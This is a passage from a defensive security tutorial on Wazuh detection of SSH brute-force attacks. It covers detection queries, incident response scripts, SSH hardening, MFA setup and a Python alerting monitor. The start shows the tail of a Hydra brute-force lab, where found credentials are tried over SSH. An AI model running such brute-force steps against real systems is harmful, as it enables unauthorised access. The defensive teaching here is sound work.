watch -n 1 'grep -c "^" hydra_results.txt'
21

22
# 5. Attempt with found credentials
23
ssh admin@192.168.100.50

Monitoring the Attack in Wazuh#

Real-Time Detection Dashboard#

Access the Wazuh dashboard at https://192.168.100.101:5601

1
Dashboard Views for Brute-Force Monitoring:
2

3
1. Security Events Dashboard
4
   ├── Top Alerts: Shows "Multiple authentication failures"
5
   ├── Alert Trend: Spike in authentication events
6
   ├── Top Source IPs: Attacker IP prominent
7
   └── Alert Level Distribution: High/Critical alerts
8

9
2. Threat Hunting Module
10
   ├── Query: rule.id:(5710 OR 5712 OR 5716 OR 5763)
11
   ├── Time Range: Last 15 minutes
12
   ├── Fields: source.ip, user.name, rule.description
13
   └── Visualization: Timeline and heat map
14

15
3. Integrity Monitoring
16
   ├── File Changes: /etc/passwd, /etc/shadow
17
   ├── SSH Config: /etc/ssh/sshd_config
18
   └── Log Files: /var/log/auth.log
19

20
4. Active Response
21
   ├── Blocked IPs: List of auto-blocked attackers
22
   ├── Response Actions: Firewall rules applied
23
   └── Effectiveness: Before/after attack metrics

Key Metrics to Monitor#

1
Attack Detection Metrics:
2
  Authentication Failures:
3
    - Rate: 100-1000 attempts/minute during attack
4
    - Pattern: Sequential or random usernames
5
    - Source: Single IP or distributed
6

7
  Alert Generation:
8
    - Rule 5716: SSH authentication failed (Level 5)
9
    - Rule 5710: Multiple failed logins (Level 8)
10
    - Rule 5712: Brute force attack detected (Level 10)
11
    - Rule 5763: Active response triggered (Level 12)
12

13
  System Impact:
14
    - CPU Usage: +10-30% during attack
15
    - Network Traffic: +500KB/s - 2MB/s
16
    - Log Growth: +10-50MB/hour
17
    - Memory Usage: +50-200MB
18

19
  Response Metrics:
20
    - Detection Time: 5-30 seconds
21
    - Blocking Time: 10-60 seconds
22
    - False Positive Rate: <5%
23
    - True Positive Rate: >95%

Advanced Detection Queries#

Elasticsearch/OpenSearch Queries for Analysis#

1
// Query 1: Find all SSH authentication failures
2
{
3
  "query": {
4
    "bool": {
5
      "must": [
6
        {
7
          "term": {
8
            "rule.groups": "sshd"
9
          }
10
        },
11
        {
12
          "match": {
13
            "rule.description": "authentication failed"
14
          }
15
        },
16
        {
17
          "range": {
18
            "@timestamp": {
19
              "gte": "now-1h"
20
            }
21
          }
22
        }
23
      ]
24
    }
25
  },
26
  "aggs": {
27
    "by_source_ip": {
28
      "terms": {
29
        "field": "data.srcip",
30
        "size": 10
31
      },
32
      "aggs": {
33
        "by_username": {
34
          "terms": {
35
            "field": "data.dstuser",
36
            "size": 10
37
          }
38
        }
39
      }
40
    }
41
  }
42
}
43

44
// Query 2: Detect attack patterns
45
{
46
  "query": {
47
    "bool": {
48
      "must": [
49
        {
50
          "range": {
51
            "rule.level": {
52
              "gte": 8
53
            }
54
          }
55
        },
56
        {
57
          "terms": {
58
            "rule.id": ["5710", "5712", "5763"]
59
          }
60
        }
61
      ]
62
    }
63
  },
64
  "aggs": {
65
    "attack_timeline": {
66
      "date_histogram": {
67
        "field": "@timestamp",
68
        "interval": "1m"
69
      },
70
      "aggs": {
71
        "unique_sources": {
72
          "cardinality": {
73
            "field": "data.srcip"
74
          }
75
        },
76
        "total_attempts": {
77
          "sum": {
78
            "field": "rule.frequency"
79
          }
80
        }
81
      }
82
    }
83
  }
84
}
85

86
// Query 3: Successful logins after attacks
87
{
88
  "query": {
89
    "bool": {
90
      "must": [
91
        {
92
          "term": {
93
            "rule.groups": "authentication_success"
94
          }
95
        }
96
      ],
97
      "filter": [
98
        {
99
          "terms": {
100
            "data.srcip": ["<attacker_ips>"]
101
          }
102
        }
103
      ]
104
    }
105
  }
106
}

Part 5: Incident Response and Recovery#

Incident Response Playbook#

Phase 1: Detection and Analysis#

1
#!/bin/bash
2
# Incident Response Script - Phase 1
3

4
INCIDENT_ID="BF-$(date +%Y%m%d-%H%M%S)"
5
IR_DIR="/var/incident_response/$INCIDENT_ID"
6
mkdir -p $IR_DIR
7

8
echo "=== Brute-Force Incident Response ==="
9
echo "Incident ID: $INCIDENT_ID"
10
echo "Time: $(date)"
11

12
# Collect attack indicators
13
echo "[*] Collecting attack indicators..."
14

15
# Get attacker IPs from Wazuh
16
curl -k -u admin:admin \
17
  "https://localhost:55000/security/events?q=rule.id:5712" \
18
  | jq '.data.affected_items[].data.srcip' \
19
  | sort -u > $IR_DIR/attacker_ips.txt
20

21
# Get targeted accounts
22
grep "Failed password" /var/log/auth.log \
23
  | awk '{print $9}' \
24
  | sort -u > $IR_DIR/targeted_accounts.txt
25

26
# Get successful logins during attack window
27
grep "Accepted password" /var/log/auth.log \
28
  | grep -f $IR_DIR/attacker_ips.txt \
29
  > $IR_DIR/successful_logins.txt
30

31
# Check for privilege escalation
32
grep "sudo\|su\|COMMAND" /var/log/auth.log \
33
  | tail -100 > $IR_DIR/privilege_checks.txt
34

35
# Collect system state
36
ps aux > $IR_DIR/processes.txt
37
netstat -tulpan > $IR_DIR/connections.txt
38
w > $IR_DIR/logged_users.txt
39
last -50 > $IR_DIR/login_history.txt
40

41
echo "[*] Initial analysis complete. Data saved to $IR_DIR"

Phase 2: Containment#

1
#!/bin/bash
2
# Incident Response Script - Phase 2
3

4
# Immediate containment actions
5
echo "[*] Initiating containment measures..."
6

7
# Block all attacker IPs
8
while read ip; do
9
    iptables -I INPUT -s $ip -j DROP
10
    echo "Blocked: $ip"
11
done < $IR_DIR/attacker_ips.txt
12

13
# Disable compromised accounts
14
while read user; do
15
    if grep -q "^$user:" /etc/passwd; then
16
        usermod -L $user
17
        echo "Locked account: $user"
18
    fi
19
done < $IR_DIR/targeted_accounts.txt
20

21
# Kill suspicious sessions
22
who | grep -f $IR_DIR/attacker_ips.txt | awk '{print $2}' | while read tty; do
23
    pkill -9 -t $tty
24
    echo "Killed session: $tty"
25
done
26

27
# Reset passwords for affected accounts
28
echo "[*] Generating password reset list..."
29
cat $IR_DIR/targeted_accounts.txt | while read user; do
30
    echo "$user:$(openssl rand -base64 12)" >> $IR_DIR/password_resets.txt
31
done
32

33
echo "[*] Containment complete"

Phase 3: Eradication#

1
#!/bin/bash
2
# Incident Response Script - Phase 3
3

4
echo "[*] Beginning eradication phase..."
5

6
# Remove attacker's SSH keys
7
find /home -name "authorized_keys" -exec grep -l "POTENTIAL_COMPROMISE" {} \; \
8
  > $IR_DIR/compromised_keys.txt
9

10
# Check for backdoors
11
find / -name "*.sh" -mtime -1 -exec ls -la {} \; > $IR_DIR/recent_scripts.txt
12
find /tmp /var/tmp /dev/shm -type f -exec file {} \; > $IR_DIR/tmp_files.txt
13

14
# Check for persistence mechanisms
15
crontab -l > $IR_DIR/root_crontab.txt
16
ls -la /etc/cron* > $IR_DIR/system_cron.txt
17
systemctl list-unit-files | grep enabled > $IR_DIR/services.txt
18

19
# Scan for rootkits
20
chkrootkit > $IR_DIR/chkrootkit_results.txt 2>&1
21
rkhunter --check --skip-keypress > $IR_DIR/rkhunter_results.txt 2>&1
22

23
# Remove suspicious files
24
# Manual review required before deletion
25
echo "[!] Review $IR_DIR for suspicious files before deletion"

Phase 4: Recovery#

1
#!/bin/bash
2
# Incident Response Script - Phase 4
3

4
echo "[*] Starting recovery phase..."
5

6
# Harden SSH configuration
7
cat > /etc/ssh/sshd_config.d/99-hardening.conf << EOF
8
# Hardened configuration post-incident
9
PermitRootLogin no
10
PasswordAuthentication no
11
PubkeyAuthentication yes
12
MaxAuthTries 3
13
MaxSessions 2
14
LoginGraceTime 30
15
AllowUsers admin@192.168.1.0/24
16
DenyUsers root
17
ClientAliveInterval 300
18
ClientAliveCountMax 2
19
EOF
20

21
# Implement fail2ban
22
apt install -y fail2ban
23
cat > /etc/fail2ban/jail.local << EOF
24
[DEFAULT]
25
bantime = 3600
26
findtime = 600
27
maxretry = 3
28

29
[sshd]
30
enabled = true
31
port = ssh
32
filter = sshd
33
logpath = /var/log/auth.log
34
maxretry = 3
35
EOF
36

37
systemctl restart fail2ban
38

39
# Update Wazuh rules for enhanced detection
40
cat >> /var/ossec/etc/rules/local_rules.xml << EOF
41
<rule id="100200" level="15">
42
  <if_sid>5712</if_sid>
43
  <time>14400</time>
44
  <description>Brute force attack - Permanent block required</description>
45
  <group>brute_force,permanent_block,</group>
46
</rule>
47
EOF
48

49
# Generate incident report
50
echo "[*] Generating incident report..."
51
cat > $IR_DIR/incident_report.md << EOF
52
# Brute-Force Attack Incident Report
53
**Incident ID**: $INCIDENT_ID
54
**Date**: $(date)
55
**Severity**: High
56
**Status**: Contained
57

58
## Executive Summary
59
A brute-force attack was detected and successfully mitigated.
60

61
## Timeline
62
- Detection: $(grep -m1 "5712" /var/ossec/logs/alerts/alerts.json | jq .timestamp)
63
- Containment: $(date)
64
- Recovery: In progress
65

66
## Impact
67
- Targeted accounts: $(wc -l < $IR_DIR/targeted_accounts.txt)
68
- Successful logins: $(wc -l < $IR_DIR/successful_logins.txt)
69
- Affected systems: $(hostname)
70

71
## Actions Taken
72
1. Blocked attacker IPs
73
2. Disabled compromised accounts
74
3. Reset passwords
75
4. Hardened SSH configuration
76
5. Implemented fail2ban
77
6. Enhanced monitoring rules
78

79
## Recommendations
80
1. Implement MFA for all accounts
81
2. Regular security awareness training
82
3. Periodic password audits
83
4. Enhanced monitoring of authentication events
84
EOF
85

86
echo "[*] Recovery complete. Report saved to $IR_DIR/incident_report.md"

Part 6: Prevention and Hardening#

Comprehensive SSH Hardening#

1
#!/bin/bash
2
# Complete SSH Hardening Script
3

4
# Backup original configuration
5
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup.$(date +%Y%m%d)
6

7
# Generate strong host keys
8
ssh-keygen -A -b 4096
9

10
# Configure sshd_config with maximum security
11
cat > /etc/ssh/sshd_config << 'EOF'
12
# SSH Server Hardened Configuration
13
# Generated: $(date)
14

15
# Protocol and Port
16
Port 22222  # Non-standard port
17
Protocol 2
18
AddressFamily inet  # IPv4 only, change to 'any' for IPv6
19

20
# Host Keys (only strong algorithms)
21
HostKey /etc/ssh/ssh_host_ed25519_key
22
HostKey /etc/ssh/ssh_host_rsa_key
23

24
# Cryptography Settings
25
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org
26
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com
27
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
28

29
# Authentication
30
PermitRootLogin no
31
PubkeyAuthentication yes
32
PasswordAuthentication no
33
PermitEmptyPasswords no
34
ChallengeResponseAuthentication no
35
KerberosAuthentication no
36
GSSAPIAuthentication no
37
UsePAM yes
38
AuthenticationMethods publickey
39
AuthorizedKeysFile .ssh/authorized_keys
40
StrictModes yes
41
IgnoreRhosts yes
42
HostbasedAuthentication no
43

44
# Login Settings
45
LoginGraceTime 30
46
MaxAuthTries 3
47
MaxSessions 2
48
MaxStartups 10:30:60
49

50
# User/Group Restrictions
51
AllowGroups ssh-users
52
DenyUsers root admin administrator guest test demo nobody
53

54
# Connection Settings
55
ClientAliveInterval 300
56
ClientAliveCountMax 2
57
TCPKeepAlive no
58
Compression delayed
59
UseDNS no
60

61
# Forwarding
62
X11Forwarding no
63
AllowAgentForwarding no
64
AllowTcpForwarding no
65
PermitTunnel no
66
GatewayPorts no
67

68
# Logging
69
SyslogFacility AUTH
70
LogLevel VERBOSE
71

72
# Banner
73
Banner /etc/ssh/banner.txt
74

75
# SFTP
76
Subsystem sftp /usr/lib/openssh/sftp-server -f AUTHPRIV -l INFO
77

78
# Chroot for SFTP users (optional)
79
#Match Group sftp-users
80
#    ChrootDirectory /home/%u
81
#    ForceCommand internal-sftp
82
#    AllowTcpForwarding no
83
#    X11Forwarding no
84
EOF
85

86
# Create SSH banner
87
cat > /etc/ssh/banner.txt << 'EOF'
88
***************************************************************************
89
                            SECURITY WARNING
90
***************************************************************************
91
This is a private system. Unauthorized access is strictly prohibited.
92
All access attempts are logged and monitored. Unauthorized access will
93
be prosecuted to the fullest extent of the law.
94

95
By accessing this system, you consent to monitoring and recording.
96
***************************************************************************
97
EOF
98

99
# Create ssh-users group
100
groupadd -r ssh-users
101

102
# Add legitimate users to ssh-users group
103
# usermod -a -G ssh-users username
104

105
# Set proper permissions
106
chmod 644 /etc/ssh/sshd_config
107
chmod 644 /etc/ssh/banner.txt
108
chmod 600 /etc/ssh/ssh_host_*_key
109
chmod 644 /etc/ssh/ssh_host_*_key.pub
110

111
# Validate configuration
112
sshd -t && systemctl restart sshd
113

114
echo "SSH hardening complete. Remember to:"
115
echo "1. Add users to 'ssh-users' group: usermod -a -G ssh-users username"
116
echo "2. Configure firewall for port 22222"
117
echo "3. Update client configurations for new port"

Implementing Multi-Factor Authentication#

1
#!/bin/bash
2
# Setup Google Authenticator for SSH MFA
3

4
# Install Google Authenticator
5
apt update && apt install -y libpam-google-authenticator
6

7
# Configure PAM for SSH
8
cat >> /etc/pam.d/sshd << 'EOF'
9
# Google Authenticator
10
auth required pam_google_authenticator.so nullok
11
EOF
12

13
# Update SSH configuration for MFA
14
sed -i 's/ChallengeResponseAuthentication no/ChallengeResponseAuthentication yes/' /etc/ssh/sshd_config
15
echo "AuthenticationMethods publickey,keyboard-interactive" >> /etc/ssh/sshd_config
16

17
# Per-user setup script
18
cat > /usr/local/bin/setup-mfa.sh << 'EOF'
19
#!/bin/bash
20
echo "Setting up MFA for user: $USER"
21
google-authenticator -t -d -f -r 3 -R 30 -w 17
22
echo "MFA setup complete. Scan the QR code with your authenticator app."
23
EOF
24

25
chmod +x /usr/local/bin/setup-mfa.sh
26

27
# Restart SSH
28
systemctl restart sshd
29

30
echo "MFA setup complete. Users must run 'setup-mfa.sh' to enable MFA"

Advanced Monitoring and Alerting#

1
#!/usr/bin/env python3
2
# Advanced Brute-Force Monitoring Script
3
# Integrates with Wazuh API for real-time alerting
4

5
import requests
6
import json
7
import time
8
import smtplib
9
import subprocess
10
from datetime import datetime, timedelta
11
from email.mime.text import MIMEText
12
from email.mime.multipart import MIMEMultipart
13
from collections import defaultdict
14

15
class BruteForceMonitor:
16
    def __init__(self, config_file='monitor_config.json'):
17
        with open(config_file, 'r') as f:
18
            self.config = json.load(f)
19

20
        self.wazuh_api = self.config['wazuh_api']
21
        self.thresholds = self.config['thresholds']
22
        self.alert_destinations = self.config['alert_destinations']
23
        self.attack_tracker = defaultdict(lambda: {'count': 0, 'first_seen': None})
24

25
    def get_wazuh_token(self):
26
        """Authenticate with Wazuh API"""
27
        response = requests.post(
28
            f"{self.wazuh_api['url']}/security/user/authenticate",
29
            auth=(self.wazuh_api['user'], self.wazuh_api['password']),
30
            verify=False
31
        )
32
        return response.json()['data']['token']
33

34
    def query_brute_force_events(self, minutes=5):
35
        """Query recent brute-force events from Wazuh"""
36
        token = self.get_wazuh_token()
37
        headers = {'Authorization': f'Bearer {token}'}
38

39
        params = {
40
            'rule.id': '5710,5712,5763',
41
            'time_frame': f'{minutes}m',
42
            'limit': 1000
43
        }
44

45
        response = requests.get(
46
            f"{self.wazuh_api['url']}/security/events",
47
            headers=headers,
48
            params=params,
49
            verify=False
50
        )
51

52
        return response.json()['data']['affected_items']
53

54
    def analyze_attack_patterns(self, events):
55
        """Analyze events for attack patterns"""
56
        patterns = {
57
            'distributed': False,
58
            'credential_stuffing': False,
59
            'slow_brute_force': False,
60
            'targeted': False
61
        }
62

63
        source_ips = defaultdict(int)
64
        target_users = defaultdict(int)
65
        timestamps = []
66

67
        for event in events:
68
            source_ips[event.get('data', {}).get('srcip', 'unknown')] += 1
69
            target_users[event.get('data', {}).get('dstuser', 'unknown')] += 1
70
            timestamps.append(event.get('timestamp'))
71

72
        # Detect distributed attack
73
        if len(source_ips) > self.thresholds['distributed_sources']:
74
            patterns['distributed'] = True
75

76
        # Detect credential stuffing
77
        if len(target_users) > self.thresholds['credential_stuffing_users']:
78
            patterns['credential_stuffing'] = True
79

80
        # Detect slow brute-force
81
        if timestamps:
82
            time_spread = (datetime.fromisoformat(max(timestamps)) -
83
                          datetime.fromisoformat(min(timestamps))).seconds
84
            if time_spread > 3600 and len(events) < 50:
85
                patterns['slow_brute_force'] = True
86

87
        # Detect targeted attack
88
        if len(target_users) == 1 and len(events) > self.thresholds['targeted_attempts']:
89
            patterns['targeted'] = True
90

91
        return patterns, source_ips, target_users
92

93
    def calculate_risk_score(self, patterns, source_ips, events_count):
94
        """Calculate risk score based on attack characteristics"""
95
        risk_score = 0
96

97
        # Base score from event count
98
        risk_score += min(events_count / 10, 30)
99

100
        # Pattern-based scoring
101
        if patterns['distributed']:
102
            risk_score += 20
103
        if patterns['credential_stuffing']:
104
            risk_score += 15
105
        if patterns['slow_brute_force']:
106
            risk_score += 10
107
        if patterns['targeted']:
108
            risk_score += 25
109

110
        # Source IP reputation (simplified)
111
        for ip in source_ips:
112
            if self.is_known_attacker(ip):
113
                risk_score += 10
114

115
        return min(risk_score, 100)  # Cap at 100
116

117
    def is_known_attacker(self, ip):
118
        """Check if IP is in threat intelligence database"""
119
        # Simplified check - in production, query threat intel feeds
120
        known_bad_ips = ['10.0.0.1', '192.168.1.1']  # Example
121
        return ip in known_bad_ips
122

123
    def generate_alert(self, risk_score, patterns, source_ips, target_users):
124
        """Generate detailed alert"""
125
        alert = {
126
            'timestamp': datetime.now().isoformat(),
127
            'risk_score': risk_score,
128
            'severity': self.get_severity(risk_score),
129
            'patterns': patterns,
130
            'source_ips': dict(source_ips),
131
            'target_users': dict(target_users),
132
            'recommendations': self.get_recommendations(patterns, risk_score)
133
        }
134

135
        return alert
136

137
    def get_severity(self, risk_score):
138
        """Determine severity based on risk score"""
139
        if risk_score >= 80:
140
            return 'CRITICAL'
141
        elif risk_score >= 60:
142
            return 'HIGH'
143
        elif risk_score >= 40:
144
            return 'MEDIUM'
145
        else:
146
            return 'LOW'
147

148
    def get_recommendations(self, patterns, risk_score):
149
        """Generate recommendations based on attack patterns"""
150
        recommendations = []
151

152
        if patterns['distributed']:
153
            recommendations.append("Implement rate limiting at network edge")
154
            recommendations.append("Consider DDoS protection service")
155

156
        if patterns['credential_stuffing']:
157
            recommendations.append("Force password reset for affected users")
158
            recommendations.append("Implement MFA immediately")
159

160
        if patterns['slow_brute_force']:
161
            recommendations.append("Lower authentication failure thresholds")
162
            recommendations.append("Implement account lockout policies")
163

164
        if patterns['targeted']:
165
            recommendations.append("Investigate targeted account for compromise")
166
            recommendations.append("Review account privileges")
167

168
        if risk_score >= 80:
169
            recommendations.append("IMMEDIATE ACTION: Block all source IPs")
170
            recommendations.append("Initiate incident response procedures")
171

172
        return recommendations
173

174
    def send_alert(self, alert):
175
        """Send alert via multiple channels"""
176
        # Email alert
177
        if 'email' in self.alert_destinations:
178
            self.send_email_alert(alert)
179

180
        # Slack alert
181
        if 'slack' in self.alert_destinations:
182
            self.send_slack_alert(alert)
183

184
        # Syslog alert
185
        if 'syslog' in self.alert_destinations:
186
            self.send_syslog_alert(alert)
187

188
        # Execute response script
189
        if alert['risk_score'] >= self.thresholds['auto_response_threshold']:
190
            self.execute_response(alert)
191

192
    def send_email_alert(self, alert):
193
        """Send email alert"""
194
        msg = MIMEMultipart()
195
        msg['From'] = self.config['email']['from']
196
        msg['To'] = ', '.join(self.config['email']['to'])
197
        msg['Subject'] = f"[{alert['severity']}] Brute-Force Attack Detected"
198

199
        body = f"""
200
        Brute-Force Attack Alert
201
        ========================
202
        Timestamp: {alert['timestamp']}
203
        Risk Score: {alert['risk_score']}/100
204
        Severity: {alert['severity']}
205

206
        Attack Patterns:
207
        {json.dumps(alert['patterns'], indent=2)}
208

209
        Source IPs (top 5):
210
        {json.dumps(dict(list(alert['source_ips'].items())[:5]), indent=2)}
211

212
        Targeted Users (top 5):
213
        {json.dumps(dict(list(alert['target_users'].items())[:5]), indent=2)}
214

215
        Recommendations:
216
        {chr(10).join(f"- {r}" for r in alert['recommendations'])}
217

218
        View full details in Wazuh Dashboard
219
        """
220

221
        msg.attach(MIMEText(body, 'plain'))
222

223
        with smtplib.SMTP(self.config['email']['smtp_server'],
224
                          self.config['email']['smtp_port']) as server:
225
            server.starttls()
226
            server.login(self.config['email']['username'],
227
                        self.config['email']['password'])
228
            server.send_message(msg)
229

230
    def execute_response(self, alert):
231
        """Execute automated response"""
232
        print(f"[!] Executing automated response for risk score: {alert['risk_score']}")
233

234
        # Block IPs with high attack count
235
        for ip, count in alert['source_ips'].items():
236
            if count > self.thresholds['block_threshold']:
237
                subprocess.run(['iptables', '-I', 'INPUT', '-s', ip, '-j', 'DROP'])
238
                print(f"[+] Blocked IP: {ip}")
239

240
        # Lock accounts under attack
241
        for user, count in alert['target_users'].items():
242
            if count > self.thresholds['lock_threshold']:
243
                subprocess.run(['usermod', '-L', user])
244
                print(f"[+] Locked account: {user}")
245

246
    def monitor(self):
247
        """Main monitoring loop"""
248
        print("[*] Starting Brute-Force Monitor...")
249

250
        while True:
251
            try:
252
                # Query recent events
253
                events = self.query_brute_force_events()
254

255
                if events:
256
                    # Analyze patterns
257
                    patterns, source_ips, target_users = self.analyze_attack_patterns(events)
258

259
                    # Calculate risk
260
                    risk_score = self.calculate_risk_score(patterns, source_ips, len(events))
261

262
                    # Generate and send alert if threshold exceeded
263
                    if risk_score >= self.thresholds['alert_threshold']:
264
                        alert = self.generate_alert(risk_score, patterns,
265
                                                   source_ips, target_users)
266
                        self.send_alert(alert)
267
                        print(f"[!] Alert sent - Risk Score: {risk_score}")
268

269
                # Wait before next check
270
                time.sleep(self.config['check_interval'])
271

272
            except Exception as e:
273
                print(f"[!] Error: {str(e)}")
274
                time.sleep(60)
275

276
# Configuration file (monitor_config.json)
277
config = {
278
    "wazuh_api": {
279
        "url": "https://localhost:55000",
280
        "user": "admin",
281
        "password": "admin"
282
    },
283
    "thresholds": {
284
        "alert_threshold": 40,
285
        "auto_response_threshold": 70,
286
        "block_threshold": 50,
287
        "lock_threshold": 30,
288
        "distributed_sources": 5,
289
        "credential_stuffing_users": 10,
290
        "targeted_attempts": 100
291
    },
292
    "alert_destinations": {
293
        "email": true,
294
        "slack": true,
295
        "syslog": true
296
    },
297
    "email": {
298
        "smtp_server": "smtp.gmail.com",
299
        "smtp_port": 587,
300
        "from": "security@company.com",
301
        "to": ["soc@company.com", "admin@company.com"],
302
        "username": "security@company.com",
303
        "password": "app_password"
304
    },
305
    "slack": {
306
        "webhook_url": "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
307
    },
308
    "check_interval": 60
309
}
310

311
# Save config and run monitor
312
if __name__ == "__main__":
313
    with open('monitor_config.json', 'w') as f:
314
        json.dump(config, f, indent=2)
315

316
    monitor = BruteForceMonitor()
317
    monitor.monitor()

Part 7: Lessons Learned and Best Practices#

Key Takeaways from Real-World Incidents#

1. Detection Is Not Enough#

Average detection time: 5-30 seconds
Average response time: 2-10 minutes
Gap exploitation: Attackers can succeed in the window between detection and response
Solution: Automated response is critical

2. Attack Evolution#

1
Traditional Brute-Force (2020):
2
- Single source IP
3
- Rapid attempts (100-1000/min)
4
- Common passwords
5
- Easy to detect and block
6

7
Modern Brute-Force (2025):
8
- Distributed sources (100+ IPs)
9
- Slow and steady (1-10/min per IP)
10
- Leaked credentials
11
- AI-generated passwords
12
- Harder to detect without correlation

3. Success Factors for Defense#

Visibility: You can’t protect what you can’t see
Speed: Automated response beats manual intervention
Intelligence: Context and correlation reveal hidden attacks
Resilience: Multiple defense layers prevent single points of failure

Security Metrics and KPIs#

1
Brute-Force Defense Metrics:
2
  Detection Metrics:
3
    - Mean Time to Detect (MTTD): Target < 60 seconds
4
    - Detection Rate: Target > 95%
5
    - False Positive Rate: Target < 5%
6

7
  Response Metrics:
8
    - Mean Time to Respond (MTTR): Target < 5 minutes
9
    - Auto-Response Rate: Target > 80%
10
    - Containment Success Rate: Target > 90%
11

12
  Prevention Metrics:
13
    - Account Compromise Rate: Target < 0.1%
14
    - Repeat Attack Rate: Target < 10%
15
    - Password Strength Score: Target > 80/100
16

17
  Operational Metrics:
18
    - Alert Volume: Monitor for anomalies
19
    - Rule Effectiveness: Regular review
20
    - System Performance Impact: < 5% overhead

Continuous Improvement Cycle#

1
1. Monitor
2
   └─> Collect metrics and logs
3

4
2. Analyze
5
   └─> Identify patterns and gaps
6

7
3. Improve
8
   └─> Update rules and responses
9

10
4. Test
11
   └─> Validate changes in lab
12

13
5. Deploy
14
   └─> Roll out to production
15

16
6. Review
17
   └─> Assess effectiveness
18

19
└─> Return to Monitor

Conclusion: Building Resilient Defense#

Brute-force attacks, despite their simplicity, remain a significant threat because they exploit the weakest link in security: human-chosen passwords. The combination of tools like Hydra in the attacker’s arsenal and comprehensive SIEM solutions like Wazuh in the defender’s toolkit creates an ongoing arms race.

The Future of Authentication Security#

As we look toward the future, several trends will shape the brute-force landscape:

Passwordless Authentication: Biometrics, hardware tokens, and cryptographic keys
AI-Powered Defense: Machine learning models that adapt to attack patterns
Zero Trust Architecture: Assume breach and verify continuously
Quantum-Resistant Cryptography: Preparing for quantum computing threats

Final Recommendations#

Implement Defense in Depth: No single control is sufficient
Automate Everything Possible: Human response is too slow
Test Your Defenses: Regular penetration testing reveals gaps
Train Your Team: Technology alone isn’t enough
Share Intelligence: Collaborate with the security community

Remember: Security Is a Journey, Not a Destination#

The battle against brute-force attacks is won not through a single decisive victory, but through consistent, persistent, and evolving defense strategies. Every failed attack makes your system stronger, every successful defense teaches you something new, and every incident drives improvement.

Stay vigilant, stay updated, and most importantly, stay ahead of the attackers.

“In the world of cybersecurity, the best offense is a good defense, and the best defense is one that learns, adapts, and responds faster than any human attacker can operate.”

About the Author: Anubhav Gain is a DevSecOps Engineer and Technical Writer specializing in security monitoring, incident response, and threat detection. With extensive experience in SIEM deployment and security automation, he helps organizations build resilient defenses against modern cyber threats.

Disclaimer: This guide is for educational and defensive purposes only. Always ensure you have proper authorization before conducting security testing. Unauthorized access attempts are illegal and unethical.